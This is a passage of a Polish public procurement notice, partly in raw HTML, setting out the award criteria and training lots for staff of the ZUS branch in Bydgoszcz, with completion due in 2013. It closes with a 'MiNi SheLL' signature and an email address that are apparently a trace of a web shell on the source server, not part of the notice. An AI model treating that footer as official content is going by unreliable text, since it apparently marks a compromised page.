Za kryterium doświadczenie trenera w administracji publicznej Zamawiający przyzna 10 punktów jeżeli trener w okresie ostatnich trzech lat przed upływem terminu składania ofert przeprowadził szkolenie z zakresu umiejętności menadżerskich lub technik obsługi klienta w administracji publicznej w wymiarze co najmniej 16 godzin u jednego Zamawiającego Punkty zostaną przyznane na podstawie referencji potwierdzających należyte wykonanie usług Z referencji musi wynikać że trener który będzie uczestniczył w wykonywaniu przedmiotowego zamówienia spełniający warunek udziału w postępowaniu określony w pkt 5.3 części pierwszej SIWZ wskazany w załączniku nr 3 do części pierwszej SIWZ przeprowadził szkolenie z zakresu umiejętności menadżerskich lub technik obsługi klienta w administracji publicznej w wymiarze co najmniej 16 godzin u jednego Zamawiającego Ocenie będzie podlegać wyłącznie jeden trener spełniający warunek udziału w postępowaniu określony w pkt 5.3 części pierwszej SIWZ wskazany w załączniku nr 3 do części pierwszej SIWZ Wykonawca w tym kryterium może uzyskać maksymalnie 10 punktów
Wykonawca otrzyma 0 pkt w kryterium doświadczenie trenera w administracji publicznej jeżeli nie wykaże doświadczenia trenera w administracji publicznej
Kryterium oceny ofert dotyczy każdej z części zamówienia Jeżeli Wykonawca złoży ofertę na części pierwszej i drugiej zamówienia może wskazać w wykazie tego samego trenera w obu częściach zamówienia
Wykonawca może polegać na wiedzy i doświadczeniu potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie szkolenia dla pracowników Zakładu Ubezpieczeń Społecznych Oddział w Bydgoszczy w zakresie umiejętności menadżerskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie z umiejętności menadżerskich zostanie przeprowadzone dla siedemdziesięciu sześciu osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. doświadczenie - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkolenia dla pracowników Zakładu Ubezpieczeń Społecznych Oddział w Bydgoszczy w zakresie technik obsługi klienta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie w zakresie technik obsługi klienta zostanie przeprowadzone dla 68 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com